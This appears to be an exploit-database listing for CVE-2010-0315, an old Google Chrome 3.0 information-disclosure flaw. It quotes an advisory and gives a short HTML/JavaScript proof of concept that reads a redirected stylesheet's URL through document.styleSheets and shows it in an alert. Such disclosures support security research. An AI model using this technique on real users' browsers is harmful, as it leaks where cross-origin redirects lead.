Google Chrome 3.0 - Style Sheet redirection Information Disclosure
| EKU-ID: 38387 | CVE: CVE-2010-0315;OSVDB-61792 | OSVDB-ID: |
| Author: Cesar Cerrudo | Published: 2010-01-22 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 38387 | CVE: CVE-2010-0315;OSVDB-61792 | OSVDB-ID: |
| Author: Cesar Cerrudo | Published: 2010-01-22 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/37917/info
Google Chrome is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.
<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>